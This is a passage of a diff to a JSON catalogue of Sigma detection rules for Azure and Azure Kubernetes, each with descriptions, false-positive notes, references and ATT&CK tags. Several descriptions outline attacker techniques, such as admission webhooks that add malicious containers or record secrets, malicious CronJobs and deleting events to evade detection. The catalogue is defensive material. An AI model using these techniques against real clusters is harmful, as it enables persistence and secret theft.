modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_dns_zone_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "af6925b0-8826-47f1-9324-337507a0babd", - "value": "Azure DNS Zone Modified or Deleted" - }, - { - "description": "Identifies when an user or application modified the federation settings on the domain.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/09/06", - "falsepositive": [ - "Federation Settings being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_federation_modified.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://attack.mitre.org/techniques/T1078", - "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", - "value": "Azure Domain Federation Settings Modified" - }, - { - "description": "Identifies when a firewall is created, modified, or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_firewall_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", - "value": "Azure Firewall Modified or Deleted" - }, - { - "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", - "value": "Azure Firewall Rule Collection Modified or Deleted" - }, - { - "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", - "meta": { - "author": "sawwinnnaung", - "creation_date": "2020/05/07", - "falsepositive": [ - "Valid change" - ], - "filename": "azure_granting_permission_detection.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" - ], - "tags": [ - "attack.t1098" - ] - }, - "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", - "value": "Granting Of Permissions To An Account" - }, - { - "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", - "meta": { - "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", - "creation_date": "2022/08/04", - "falsepositive": [ - "User removed from the group is approved" - ], - "filename": "azure_group_user_addition_ca_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", - "value": "User Added To Group With CA Policy Modification Access" - }, - { - "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", - "meta": { - "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", - "creation_date": "2022/08/04", - "falsepositive": [ - "User removed from the group is approved" - ], - "filename": "azure_group_user_removal_ca_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", - "value": "User Removed From Group With CA Policy Modification Access" - }, - { - "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/10", - "falsepositive": [ - "A non malicious user is unaware of the proper process" - ], - "filename": "azure_guest_invite_failure.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", - "value": "Guest User Invited By Non Approved Inviters" - }, - { - "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/06/30", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_guest_to_member.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", - "value": "User State Changed From Guest To Member" - }, - { - "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/16", - "falsepositive": [ - "Key being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_keyvault_key_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ] - }, - "uuid": "80eeab92-0979-4152-942d-96749e11df40", - "value": "Azure Keyvault Key Modified or Deleted" - }, - { - "description": "Identifies when a key vault is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/16", - "falsepositive": [ - "Key Vault being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_keyvault_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ] - }, - "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", - "value": "Azure Key Vault Modified or Deleted" - }, - { - "description": "Identifies when secrets are modified or deleted in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/16", - "falsepositive": [ - "Secrets being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_keyvault_secrets_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ] - }, - "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", - "value": "Azure Keyvault Secrets Modified or Deleted" - }, - { - "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/25", - "falsepositive": [ - "Azure Kubernetes Admissions Controller may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_admission_controller.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1078", - "attack.credential_access", - "attack.t1552", - "attack.t1552.007" - ] - }, - "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", - "value": "Azure Kubernetes Admission Controller" - }, - { - "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_cluster_created_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", - "value": "Azure Kubernetes Cluster Created or Deleted" - }, - { - "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/22", - "falsepositive": [ - "Azure Kubernetes CronJob/Job may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_cronjob.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://kubernetes.io/docs/concepts/workloads/controllers/job/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.execution" - ] - }, - "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", - "value": "Azure Kubernetes CronJob" - }, - { - "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_events_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.t1562.001" - ] - }, - "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", - "value": "Azure Kubernetes Events Deleted" - }, - { - "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_network_policy_change.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access" - ] - }, - "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", - "value": "Azure Kubernetes Network Policy Change" - }, - { - "description": "Identifies the deletion of Azure Kubernetes Pods.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_pods_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", - "value": "Azure Kubernetes Pods Deleted" - }, - { - "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access" - ] - }, - "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", - "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted" - }, - { - "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_role_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", - "value": "Azure Kubernetes Sensitive Role Access" - }, - { - "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_secret_or_config_object_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", - "value": "Azure Kubernetes Secret or Config Object Access" - }, - { - "description": "Identifies when a service account is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", - "value": "Azure Kubernetes Service Account Modified or Deleted" - }, - { - "description": "Alert on when legecy authentication has been used on an account", - "meta": { - "author": "Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/06/17", - "falsepositive": [ - "User has been put in acception group so they can use legacy authentication" - ], - "filename": "azure_legacy_authentication_protocols.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", - "value": "Use of Legacy Authentication Protocols" - }, - { - "description": "Detect failed attempts to sign in to disabled accounts.", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_login_to_disabled_account.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", - "value": "Login to Disabled Account" - }, - { - "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", - "meta": { - "author": "AlertIQ", - "creation_date": "2022/03/24", - "falsepositive": [ - "Users actually login but miss-click into the Deny button when MFA prompt." - ], - "filename": "azure_mfa_denies.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078.004" - ] - }, - "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", - "value": "Multifactor Authentication Denied" - }, - { - "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", - "meta": { - "author": "@ionsor", - "creation_date": "2022/02/08", - "falsepositive": [ - "Authorized modification by administrators" - ], - "filename": "azure_mfa_disabled.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://attack.mitre.org/techniques/T1556/", - "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1556" - ] - }, - "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", - "value": "Disabled MFA to Bypass Authentication Mechanisms" - }, - { - "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_mfa_interrupted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078.004" - ] - }, - "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", - "value": "Multifactor Authentication Interrupted" - }, - { - "description": "Identifies when a Firewall Policy is Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/02", - "falsepositive": [ - "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_network_firewall_policy_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", - "value": "Azure Network Firewall Policy Modified or Deleted" - }, - { - "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_network_firewall_rule_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", - "value": "Azure Firewall Rule Configuration Modified or Deleted" - }, - { - "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", - "value": "Azure Point-to-site VPN Modified or Deleted" - }, - { - "description": "Identifies when a network security configuration is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_network_security_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", - "value": "Azure Network Security Configuration Modified or Deleted" - }, - { - "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_network_virtual_device_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - 